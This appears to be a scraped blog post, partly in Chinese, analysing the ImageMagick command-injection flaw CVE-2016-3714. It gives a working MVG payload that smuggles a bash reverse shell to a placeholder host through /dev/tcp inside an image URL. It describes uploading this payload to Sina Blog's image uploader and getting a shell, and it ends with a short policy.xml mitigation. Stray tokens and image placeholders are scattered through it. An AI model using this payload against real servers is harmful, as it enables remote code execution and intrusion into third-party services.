CVE-2016-3714- ImageMagick command excute analysis

Vulnerability exploit method are as follows:shell

新浪博客发图片的地方
 bash

1.png



选择图片

图片内容为
 dom

code 区域tcp

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")'

pop graphic-context


 

2.png



一步一步点到保存成功
 url

3.png



开始上传
 code

4.png




 

5.png



shell躺在了vps上
 xml

result.png

修复建议:vps

使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加以下代码:图片

<policymap>
<policy domain=”coder” rights=”none” pattern=”EPHEMERAL” />
<policy domain=”coder” rights=”none” pattern=”URL” />
<policy domain=”coder” rights=”none” pattern=”HTTPS” />
<policy domain=”coder” rights=”none” pattern=”MVG” />
<policy domain=”coder” rights=”none” pattern=”MSL” />
</policymap>get

相关文章
相关标签/搜索